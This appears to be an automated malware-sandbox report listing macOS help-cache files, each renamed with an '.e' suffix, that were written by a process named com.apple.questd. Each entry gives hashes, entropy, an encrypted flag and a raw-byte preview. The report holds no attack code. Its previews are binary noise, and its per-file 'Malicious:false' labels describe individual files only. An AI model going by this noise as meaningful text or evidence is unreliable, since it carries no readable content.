                                                                                                    Preview: ...K.a2..c......\}..lq...!.....u.z..c .4.....W. ...s..[.P.'.W......).&.W%j.......Z.........e............[3...k..I...}sH.VX..g.h{ U;6SjJ....Pg5..i.a..U:...dQa2A ..=k.p..u)...h.......... ..#.j^v.!.Q..rf{h....B..6.........Gugv.......a...Z.~..}y.v...O.1f@.m.<.?BO.....K......e<..........x..|m..............X...E.8.............1F_2td....Wl...BOW..{a.l...C..K$.].4........s...B..c+.t(d.h1l....x%.VP.$..A..q.=.[.. ....oA.....ae/L..J.e.a....m.~...km+d.W5yI..<..,.Y{....:U....C.y...Q.....v....<..C.D...C.W./*.......R....i.V.{-+... .z....^l............{.\.e..w5...z..<...@fu..~.N.......fP10......y..,%.V..l.`....._N.......u.f..St.QmR1...P..4.w.d.,..s..[.O.F......u<.;xx../.....U..<."....qn...a.X....O..W.f....{.X.?./.....%X5...`3...!.s.X}D..$.WZ]k.4...Q.+.5`S.t.t.....((.S= .eR.....}..<.u.us^.D.~...z.l..."xc.?ZJu.n..^#H...f,.g*..`......M}....pA-...Md...H.....dT0...HP...M..=.W%....;6......(*M..y..!..3/..DF~.B(8....&.m../.r,......L..j....s......f...D.;'I...V...R._.......!,...b.A.Dp....x....../....N.>Ja1;.?..
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.machelp*10.14.4/.en_GB.exactmatch.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):3290
                                                                                                    Entropy (8bit):7.714111405098521
                                                                                                    Encrypted:false
                                                                                                    MD5:2CBEAF6A534CD2D27BFC0BE5F8BFD0E6
                                                                                                    SHA1:F2FA7B81DF86DBE76114356DF89C88F65871301B
                                                                                                    SHA-256:FAE5322ECD70911E85E7E41093FD37A66462B303A59F00357A462A0626815BF9
                                                                                                    SHA-512:546705BD0B3AB9F0E91B2AD97EBE1AE5533180BEC3DD5034F9572565C9DD9CB06EED9BC207674B030AB214660455BC393ABE3EF9D174CDD7ECA005F921A7E190
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...#......}PmZ.C....n..Yj.....n.......C...m.......DV.R..B.Y...aIf.........7.?P..|.X...J+.S...Y.........C.....u4..t.^j..OYRQ..d.......9.hp+.l.............5.....S<|o.M...:...........d.F.l..$.2..z.T..Q.H.G.2......../X.3.y..7..1'......J..f}.`..ROf.j{.(.;.wTM.U..x.Zc.o.....%.......Y...4......j..##Yb,..N....uU./.}%P.5..y=.u...D?.$A|{M..g6..w.P...< (uY....91y...oVC.v..v..[B`m^...........dz.T..Q.H.D.?..D....".~f....F.EP.h.|.@.....f}.`.........1}.!.z.7.{r..G(...k.I.*........M...w.,6.Ek...6_.A..*..}.......\.>.;.wTM.U..x.Zc.o...yK.1j.....Y...!Jfd...j..##Yb,..N....u..cV.j..5..y=.u...D?.$A|{M..g6..w.P...< ..Bf!.8^1y...oVCD]0l..z(..!F..%.{r..G(...k.I.*..ROO.[.vx...._..8.QaiK..~..*..}..j.t..D..h....Zt....n.R.......x...^1&J6.!xxAS...3..'$d.U}z..7.a....*...,...HR4Ldj)..=A.;g..nSh....\...a..P..r.+...Yue.....z..|9M_.;.wTM.U..x.Zc.o.z./.NR......Y.....55~|..tq.r.E...N....u.MU.........9./.{r..G(...k.I.*.........h...\..Z.|.X.f.m...*..}....9>.3..9..P+..2.o.....E...}.......BoE..w.C.>.....RyhO....sWL%...0.H....
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.reminders.help*6.0/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):14970
                                                                                                    Entropy (8bit):7.974649711816614
                                                                                                    Encrypted:false
                                                                                                    MD5:A9A7E4D9A196BE4E85562D2E76AE07BE
                                                                                                    SHA1:B902422658A6870DA30DA1BA74B8344F9833EF74
                                                                                                    SHA-256:D53B15E37C66120DBEF57BB3DD1C70B8FE836B43FE83BE448D19D16DE8297965
                                                                                                    SHA-512:E3D895696ED5A86D213F7EA84171EAB3437C74C972AA2182ABE1CD07FAC387B87B9EDB0B4EB1E2097E28A7D058C901AA7781A8920218F3C4592F895F03E2EFEC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: 1...#{"..%...=;....15.G...[.C....a.X.(6...N.f....P...&.....B*}..U.....??|...i.....U...E.kr..t.B.L..$.%.;.9.\.T.<[...b......_upr~..._...O..r.2.E...........N....e.i..}].p.6P...F.'.....7....}Df........g4\$.on6GxWq........mX...%6Z.5..%...nC..$.. ..b....7...*....@ .L.#...=t a..?h>M...:...^.y.3BL:..tR..K...u4..!4..8.\...@..e..7...:.rEF....'OW.......>%...b..([.............us.}..f.#E.}!..................#to.=.....<..=h.......G.Qi.H...E.(F....]...0.b(2...{..(..dW.....Pe..z.P.....<~q..K..t...?!c.A.Z...$GB.......K..Z.........>0Amcu....*s.:........i&....d.i..^d....^..nS.q,.BlyT9.;...w2.G.....w.\.......fyi......t.`O...Et.'..dV|J....t..43+.&..c...,....,U.....T...)w^.Vi..%..!...2.1..P~.....)^.@+<....&...."c;:....9r.@...$.D8..[.3.. :.._.;l:.lR#.....B.mxW..yaW+....-......._TF.j........r).`..,Y..5..b>.;GX.._\JR...4}.F..S.s...........Z.F.c.ZEd..X...{T.....Ys.0....t...P.........lW3*56..\m.......WvU..I..M:..a.UZ ........)q...o.zyE..Q.....d..w....."t+Y.7.GJ...L|.6.E..<......74wR...2+...-...._..7....."......
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/.fileAttributes-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.4510014557027704
                                                                                                    Encrypted:false
                                                                                                    MD5:CE08AFE61374F3BD7833C3C5F64C4B8E
                                                                                                    SHA1:4ED847867509B38200143463370FF64EAAFC23A7
                                                                                                    SHA-256:01B12B04916335E0C6F01CF3D52B86451DFAE941428948BF420EBB13C52D1B92
                                                                                                    SHA-512:8A490341FF45A66EF0C20764346FD136BB0E57F57085D1CB35F354D5F914915769349439E5EA1A6A70C67ECB95AE3FC0374341587032648E0BC6DD7B3AD2CE48
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....L..4.[...4....\.........,.....Oa....{..\.>.k....L..4.[...4....\.........,M3.90..i...{..\...........ag.{.;.9.o..h$................R...@+{..y.H.....g..gm,._.Y..<.!.......0!8..A....?.......y.H.....g..gm,._.Y..<.!.,...u....&..@.....0.`6.....n2....(.w...\.[O.j.!W.m.^e..,..=-H|R..T.J...Ky....#D..u;../.....QP..L6..;;...................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/.fileAttributes-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):185845
                                                                                                    Entropy (8bit):6.998773354241605
                                                                                                    Encrypted:false
                                                                                                    MD5:2F4B7ACD37BC21D89D20437D643532F6
                                                                                                    SHA1:CD31A57FD439D810FF6090BACC72D0FDBEC04BDA
                                                                                                    SHA-256:5CB6810A9A452B7339A0F29EC7E70B7ADA90D0A68B286D28A24E33EF845A3997
                                                                                                    SHA-512:C7FFD251C3AFECB1CC6C81A5CE24C6137DCAD3554B310F779F508E1C09803D160A534039FC65FE1287B02884E16E581F3DE74615187FF101693AAFB0A78FB74E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: @....[...L.-$........Oa.<.+...t..bz.Hy.P.....Oa.K;d....!.#.1rS..a....lT........tO$d.....................{...#Rox........t...7.........................]!../.G.....%....+.........................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/.fileAttributes.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):4410
                                                                                                    Entropy (8bit):3.74539163788301
                                                                                                    Encrypted:false
                                                                                                    MD5:F972E56AEB1743B60A305C3E2A171212
                                                                                                    SHA1:0D5552A6C93349EE212C196D2A6A35AEE9AF1A40
                                                                                                    SHA-256:92FF1EC0FB700DB1881D2DCBA6D0A0BC734B27530BCBA1A74BA7C6D28A68114F
                                                                                                    SHA-512:CB541136B85F5AD1233FDE35930FCA50C8C58E924640C5CF3E303B36F849CDB551D9584C4CC26EF845BDEA5FDDB3EB346B5D06A68DE229A35801ACB8770C2BB2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........tp.v...})................{...#Rox........t...7............L.D<.+.%R4,....../.G.....%....+.................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/.lsm_map.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):7966720
                                                                                                    Entropy (8bit):7.9998616360604435
                                                                                                    Encrypted:true
                                                                                                    MD5:0C26F86AA4F261957EEC1971712320E4
                                                                                                    SHA1:9568E3F3DF3F2715BFC25FB5630F3611EDDFEAD3
                                                                                                    SHA-256:D582BA27F07FCA0D5F63E11CD1B703830630306840FA590066B1DE4E330ABC57
                                                                                                    SHA-512:FDB9915A2BFFFA8F191829781A1D1173CD1B6120E6CB84538DBE7FD2BEF7E5BF7378C7EF6321DB11A11FE4A8CF9B99EE7B37673D1C582CDC5144AFDF8E0E33A9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....yg'...]..........JK..aO?.(.....>lk..p..B........k.4.0n.Cg.Gw..q.....`-?7h.%.r52....\..%..G..:.......'..[.s...t..2L..q.......f2?......@ .H.Q...U.}..Y.....?..f.'#n...zi..B5.KBcj.YX....r.-.[.R.....Y.%.{<...J.eqe.9.<..t./g...Z$-T.l|t+{.........aMwp'..0.....H.]A..6h4W...v.u..@.OAZ.}.....`...X.y.&.|..N....i.A.2......^3?V..~..6'........O...V........mD.....J...uN.es..!..;.p.....uz....jM3:.b....\#...]y...... ..r...........;Vt.....7...Q..fm....7R.!.....;....,.y.#-..*....C..L?.........5C.&......mj?O..Ij3.xV..T....Z.Xk{|.....~......Q.-..!....../.A./..e2-y6.../>_...Bk.U..!^+Xq9.g.\..8...0.e.u......j.^.?=.@-.64..0W..t.'..1.C...U..T........L...Zr..w......).T.g.._!N../S... ...,oG.. B=......>B...N...-.V..F......</iH.R/..u..J.....+.q..G/>...$)...8.4.%R..8.J..I.~I..j.2z.\.v.s2.%1...].....wb...l.5.....H...u....YF...9k.YAi.Y.c.1....../.$.....8>..Xs.f..j..8X.J../(O............\Fv.....z..FN...e..7....t.M.*..5.t..9..v....Ik..<).w.h1W....e$.e...~...gEn_...].my.'.......w.?.-~.........h+PP.....Y="Q.6&C.5....
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/.suggestions.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):283611
                                                                                                    Entropy (8bit):7.998657238603301
                                                                                                    Encrypted:true
                                                                                                    MD5:1264992C003842939AF8002580691171
                                                                                                    SHA1:9E0D6247AF610CA83CC054A8CEF12BE90BA396EC
                                                                                                    SHA-256:930506517A5EB893083EE499B917B4321A06AC34D88844990284A75F0487B3CE
                                                                                                    SHA-512:8983029090AA35B5A41520292C621284E51717D35B9568AF509D9A3D07D014D62AF4044053FFA2CE096A67BB69B404312E2189E684B15147D9BE079ED1B3C84C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......*...}..I......mG..XH..=......H.......n.....z.n..SC.%h....t....q.....l{..|..oi.............~...hi.0xt.K]...5...-p...F.... D..O.cs..~?R/c.V.~....<....wI..V<.U.N.T..D....<wbK.zN....^..'.I.......h..5'..Z...(.........[...I...J@....=.%.......Dz..f^...y.........B,..`E:.-...."...*d>.#...f\...-...[.gW.c........6..9..p.7*).t)..................y.........."r.MN.z>.....S.q.......y..-.*..@[.^c y....f4fN.H.5C...........Gh...+.3bB.....~...].........1...|~0.......u.@gE......0.........It.F0H.>8......0$u..R.`s...E+.^.\#.}.......L.+Q..cO{.@gE....9id3GG.}....|.....64.......0$u....9.9.....:......l.K;U.r.C#%...bqi/..6.%.."............L.........K...(...[.;7..W..Km<...-.t.Eu..}<.$......E6...A.2pk...... ..{....K7d.T..XG6.R.......g....T..:I...'&O.D].....<.d.MN.z>....\.......QK..=........L..O.$3.=...b=.H... ......0.:..].GW....G........LW.7C'........../.nq-2.10Xo...7`....\.Pt.....|...._Bz........Qu....z.B.,...jLg.."h;.*.....T..z.zi..D..d.s..`..N^Y.f....j...y2L.Y.Z..zf..............f..Vf..f.^...'..N....
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.ActivityMonitor.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):6386
                                                                                                    Entropy (8bit):7.925905493437481
                                                                                                    Encrypted:false
                                                                                                    MD5:2B26E6AA605D68B5D3D199A29278AE3A
                                                                                                    SHA1:F9E3FC6D2CE125DAE39A2F9262BE4C44431531C7
                                                                                                    SHA-256:8752BBEB666E294F894678A5FA534A62EFBCF8B0F33932A114837C327072504E
                                                                                                    SHA-512:07467DE696BFAA598BA24C68B989A012E42031C9677C51D72766B10D5AA37669707713369BB639EC1F3DC4CD64C8FEBFA7CB7CF46FB000F4B159E0B8900DDF81
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w..<o.i..Q.G.)dM..c._j.]$...;!..5..J.....Or..).wc7..F.."........a.o....|....x..)pGC..k?.8....{G...O...,k>_s.].o.4.D.4...e..........{&N.I..%`...c`.....T.[...EjU?q........e.Fp.e..k.....W.w.f...9.*..WK.f.E6.v.o...................Y.2.A.e.0:....O1N....hy..VmM.#...x....&(O.....%.P,w..HZq...."y.%...Jz....z+..Y.....N...b..y..Z.|N.....v..66m.q...>.......#/<..a<.&.A...&..b...."1hy^..........J..*<Bsd../.e{.\.....q.Cf..{...<!...4...e.s.Jj.5....;qh.\..z-Ad.]...,T.=A.c..>....3..2.Ib......[E...4=K..:rj...z...S.......".5R.;.,......y....g..........]....{..pz.J`.D.....M....\-a...n"".3......2".........B.G...w.....,....g...(F.K...H.V{..z.?ZGj .>.,.../.JP...4^I5.Oe3.l>........lr....I...V`_.,OV..r....C.A.+...6e.2.7...$....I`...<.1a.y....eQ..^+*.oBm.&..VtS.....Tz.f...l~..+...A.].....\.Q........$.. .....U.GrOD.bW...H.4..!....BF}.]Ho%...z..Kq).....Q.c....I ...Z........\..$.._$.....n.......>...HG.%..g5.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.AddressBook.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):12602
                                                                                                    Entropy (8bit):7.968774553329117
                                                                                                    Encrypted:false
                                                                                                    MD5:BEF4CB81692A09381CDAC89E9737D53C
                                                                                                    SHA1:0F1AFFDAA06EFBC2F84A1EE1B65083FBD289E97F
                                                                                                    SHA-256:BC7314B4D27D5ACDA8C408EEE6D6F47F920AC3A35F73841874D60C8ED37C3618
                                                                                                    SHA-512:84614FFA6A8EE7476D123F8580D1BBC5C3E2EAECD8285D527C43F2435F156FF3931F34BF92F4591C18172045617CB11DFCC1ABAA8C77461610914D54D65FA687
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w.8.e...+.+.Be.....{.r..v..............*./.?.BQ..V..Qs..<.Pi.L....1-..8C....-.e..-M.?ZP....Z..vY..z..Z..o.zZa.....^.1...`.:.%....kQ...0dm..V...ddN..s..`.7.*%0.....!n.d'3.Dx..-.Q....X..d....*k5...,..c.384o...y...R.1.sw.W\P.gn.|..H.la^...#B.'.....,....hl{.VT..d=Il....kU.8.u..v.c.bW.NH.ud...m....n..h@.Y.b.Zh/.u.............gJ)I{.E..R...D|.E@..f...........{".M.Lz......'.5'Q....f.s...q..y)...]...].6.'....SL|.E.........b4....H;..l.pV.hS.o.....x.%..D|...(..ts..w2)_.....O.g...I...A.$...?q|.e......~.n....=....wj.M..kg.7.7..~...$%.;............4f..K..;...K....'%....W....;.-...).....].+.\.h.D...l....f..W.T.....B..5...Q........dC.;c3..3...A...%...w$.......p...t....3b....P...H.ke`E.d.t.Z.3..}.(...L.1D.........R....V.....O........w...2.....Y.i ...[.[.V.?0.U...w..9......h...K;k.R.I..z...~...N....nM............)..8.&..v6h.d..@.eh..).%.G....>....Gkf.&..l{..u...F.T....d'.E,HB....C.w.....l..6..#.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.AppStore.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):5970
                                                                                                    Entropy (8bit):7.9240281622913304
                                                                                                    Encrypted:false
                                                                                                    MD5:22035AD1D3A347C4DBF67F3E8EC2F183
                                                                                                    SHA1:0C87017858C9919FBBBA278312CB1B2EAA9E457C
                                                                                                    SHA-256:EB9FECE080B9F0BE89DBA439D44BA8598B99601EFB99F606ADAE9F1BC2AAA6E4
                                                                                                    SHA-512:ADEF0D8C552BC9647B9FB355E22DB0906052517CC8413AD22638504B5E643B239BF971875351073B37F6857AC0E61A22E50B490F675610D111281F652CFF81EC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w.:yf..l.j@.E..o.=c._j.]$...;!..5.Y!.4...t*..tn(.g.6.........lp..kL....1u...\=.....2 ..b.....G....F...15....W.....4L.s../3.Q.<.`N..~.9...(....!w"4./.H=......m.@.STe^.....z.%SU.....(.Mf..\............^....X..|...c.^....<mM9(...EJ.k........6.....%!.X.?3G...Q..|[..3... ..%...E3z...Q?yF....1,S...zer..P.XCqB.).S6tm;.7..8.oS.........LS.4................>I\.....n....d.... .....]....@4.S7...g....;6..`o~..jz...O..oNd5.s.q..2O.w...A....,..3...f......* T..&1..7U.q..>A...H...}r..........}.s....9.....[..V.?..../H%.-.........%.4..Bs.&.....8XB.5.7*......b..;....A.*..0.9..,...........e+2.dc.fg.l"..g..^.......c......L...Wn.........n*A........3\..@g.).Z)o.a..n.g...........g ...{~.../:7.Jf*B|..G....=s..:.S......m..J.....1...}...v..)/F.*......."/.....{.... .Z....E..E......^]..N.......8..o...}_.=.K...6..h......u...*N^.k.s...7gX...a..V.....V+...S..H...d........5*...p..#9.~W.#.x.+.66.UI..uX.....C.M..
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.AudioMIDISetup.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):10074
                                                                                                    Entropy (8bit):7.958052933813976
                                                                                                    Encrypted:false
                                                                                                    MD5:1A7358C44756A564FD69EF773F055FAF
                                                                                                    SHA1:846B38741B18E5C8FF6437256DF8CCF7E15C06F4
                                                                                                    SHA-256:356A6038E275958530FEBE3081F6148E4F48E9CD6E011D5A724FD21A3FD1E51B
                                                                                                    SHA-512:AD84D83E617A129B75CDD9D34B3F9C59471EC01DA67A7CCE68E403F0393E1C9B5FE1496D0A41B4498DB96B2488CD70CC6C24E9E2451C2BF0D389667782C0EEA3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w..8.7y..Z.....w.wc._j.]$...;!..5.7......nS...1D.......e..`......I%...}.M.e.}z/9.....W.......I.v.X[~..>.kc.....5..."(......2k..X9H. ..XU...E;tm].....<.xY......cLa~.T^x..M.....|.m.3.a..#./..nr=.mXE.9Y....n.&.W..Id.......|......1...qLRd$f.+..../..]P!...R...D|.(!>.`...K..1.....=.....@..~~.......qH..W.T...5$)!...W.^.]R1...'ZO....c:.j..c.Y.#/F.Ie....U....:...;..V....,...+.S..&Pr...O....u..!6..k.5..V/|q....T.._.), .D=:%.....1NC...\-.yso..X.......ld...o..C.v.>.B.F.s0..p._*.C'.....2#.`.Fm3...7zW.....u...u^d....wk....zE....xe..\-.L...?E.PiA..._9..Yy.V .b...6C.'6Ue.+?...s.x..~9.Q!...|q...:..G...)q...a.1.iD...",....3IF.?..9.x./?...`...~9nl..7.s.....i..1.~...c..q3.cG..........?'...X9k.-..).<...d(...{6II8.I.....l+5lB@s...s.%...U`........'s.#;....?z.q.....m.<R!;'..M....V...#R.[.e{MLY....lE..q.2........3V.?.B....C.......GXC...^.U~9....w..(..i;Y....cM..|G.S..".)/.M.}f..c}.u.v)*...2....\r...pJ.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.Automator.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):9538
                                                                                                    Entropy (8bit):7.957751807207428
                                                                                                    Encrypted:false
                                                                                                    MD5:E6D49AB861AB63DDDE035B305007F615
                                                                                                    SHA1:EA86E37C5CFE893612FD8F3951812BAEBB7C43C9
                                                                                                    SHA-256:B96A291A7E0EA38E02CE592B9A7002B9041255057244C9187D098F174A211546
                                                                                                    SHA-512:C8154CF2C928B5AF62DE57104C2A12FC5BDF2C93DD835E21F966A1306D8E2BBD4B347B82E87FC37057EAE8BF964D803934E59AA9AD34A48392FA944F6F3B384F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w..h.X..l.;e......c._j.]$...;!..5..&g.Z.a1..O.vR.b..."..q..3&..._..%...l>.,.5..I#....NvG%_Z.j.{.......H+..].'66....VE..d......o...?..a..p.....6R.;.............R...q..Jp..a.. i..@r*......O....9....).....w.....O..J......n....^"-..$...[../...[.T...I..2.0....9k..yP..v?.W..h......Z.....IK....w..........N...0..............e. ...X...DY.6.;...+.....O.s#..`.7.?..4iY...eF.........K5....0&..q....nZ.(E.%.w...Z!.P...sBiH.v.|...^.J.GV:5_ml...1Y}.IF...4.G...($c7..K....u5....5.sCn....).D...By.`Q.....O....c9.h~......G....-To..Qz_.....7HN2z..&..=.e...;y...].......e.v._....%.;.0....t.E$8.g......8...i.....PQ'.....".$7.z.@./..U..h......\.....B....R...`...W.....S.g..Q.......xP:.C~.P..Oq.Jg...*...........k.%...z...z..vd....{.........k..Th...X....h...3....~.. q..Hc...uKKd.n.....U.Mt<..J..B.?#..y'.s.....E#.AM";..Z_...|%.~.a....u.;6d.ak.{..U..pU..R..MLn......=..1N.}.c.....<..J#.......(...I.)....:...:R..
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.Console.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):4594
                                                                                                    Entropy (8bit):7.882787507028953
                                                                                                    Encrypted:false
                                                                                                    MD5:458AE16872F9E9A60AB578F281DE1D90
                                                                                                    SHA1:CA588DD50BC15CECB506D00AD2A371F5ECC425B6
                                                                                                    SHA-256:5FACB0398D7605A785BA3AD24A4F068871943AC6EC50E418E1562558540FE9E2
                                                                                                    SHA-512:5D5C10FBD88E4C7D297AAA73DFE753D1DD6FFB5969F3AF98FD89D5B0B330D7E7797E3E1DA1C7B6FE4406D762F76DB9721B738D4634AA203DE64882BC859681A4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w.........S&h..t_.c._j.]$...;!..5.4..0..'.A...K.<>.......h.%......(..y..po.Q.Gq......I.j...P....VK...N&Q.e..|L..0$....._n......+....R]d".%..G..W.C ?bs..V...........,.;l3.C?..6E...........5....p4~./..efr_..*t.d.......D.}..s..\..k%U......&...6.%......U......\'..YA..d...f.k.F......7..{.X.....d.}..E!.$'..m.</y]Y..rA...?....>PE?..<1...MK7+..`z...{......J.j......y^.C....<wTSW.q.u..o.Nh...O...[..b.0..._E.&u+q...........x...!|..K..J....d@..E..Es..h..=..-...K.u..C..UB.|[.....kq'r./....t.....QM.,.....*..zp<....Y..G.....b...R...j...Jm.l.@^.f.*..M...;_..<.....-'q...h..ht.W.W..v!Vy.............+s.Z..D..V.Qw6.[.d....x...._.B.l.u.r.vV\g...5...ieR....)S...|o..U.y<.|..w.o.gr...1.-$...bJ...i... G.Or.~...h`\.h.%b&.r.`.{..(W0..6.t.B.l>.:.q...Y.l..,....5g;4......$..S.....}O.K.....D....9##.."*B..>."=.fe+zGV.._...Dp....V..a....].....T..H.....q>a.*.J...S^...3;-(.h7...#......o/wDf.cH..D......K......M..
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.DVDPlayer.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):12738
                                                                                                    Entropy (8bit):7.968372333200882
                                                                                                    Encrypted:false
                                                                                                    MD5:C9ACB50A0915B3BE96229E1C086B100E
                                                                                                    SHA1:8B1B3FC4B2640DD6035A5887B9D633D1F6FC2164
                                                                                                    SHA-256:3FBFAF4891407A87610ABE2D719E206E042D9BC73A8BBDFB1AD86FC2D3B544BC
                                                                                                    SHA-512:C32D931EA3BB98B6EB1965394A40651FBEFAF2C6678B80A74F9060272D43A1AF1B63C22D14FFDB4CEE10CCCF81BAB873CE09EAF966891C66A19480F1196938EE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w..p6zOJwDbt./e.H8.{.r..v..............9.67.>6X.J.v.B......E.,...Bo..\i.q...i.......k..[$.0+........N.3..\...+..h.B.|0....~...[.C.....[:......%...l...Z...?./..E...?.-.I..H...Q?#.....b.k.B.(gL..W5.Wv........F@L.....K..y*.-....o.!%. ...z.)a)j.8_.tI.,..}.+.iBFj.L`u.^..0....7...$b..j..0$ >..\..';b..A.X$..x.'..q...r(<>..A..W.......&......L...g..:N..p.Nl....h..3..c....BT...W..E.....<...5..@..@L...;r .e......`.p...A.... o.O....e.QB.....,..-P`.^Z.Q.......e.^WJR.X'L.&....%eh.)@..P..A....t_.....j7...J!......avL...(.BU.....#..x......D.6Sj.%kD.6..pd.D.a9.&.J+...5^.._.>5.GF.?.h.....Av(.......6.QY..^Wj.W8......%.gM..\&..h....:.Y7Qh.PQ....Y..3.J../.{...~%...1.*}T.E.......Aj.W..t.....#U...!....Iy.O.x.h..+>...-$.@...B...qt`.u%.3....G.,..$.y(?Eh#G.....dn....d.@q..5.a..h...9.`....5....v....J................}..x...i....ti..n....s....w......hQ.../.J.Z.. ......x.:...q_..........]........r...:...5.%]
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.DiskUtility.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):9410
                                                                                                    Entropy (8bit):7.952891923398419
                                                                                                    Encrypted:false
                                                                                                    MD5:5BE0380C2C32165FD4BE615C6FFF60DA
                                                                                                    SHA1:CFBC28B84127F2AD4BE17DDDB046DFA73F0883A3
                                                                                                    SHA-256:880DD017E3A7D089C0F23F2F97904DC92F13A9A57D697F280DB872054CFB8EE5
                                                                                                    SHA-512:7D226E894E9AA21F8AAFC26B8FDF605EF6F3D4CFD5F72C2065AAB279448ABCE723E8F6624705AFD9D2735AFFB391366F444406A93BFC8ACB61F93C92F1DE0AEE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
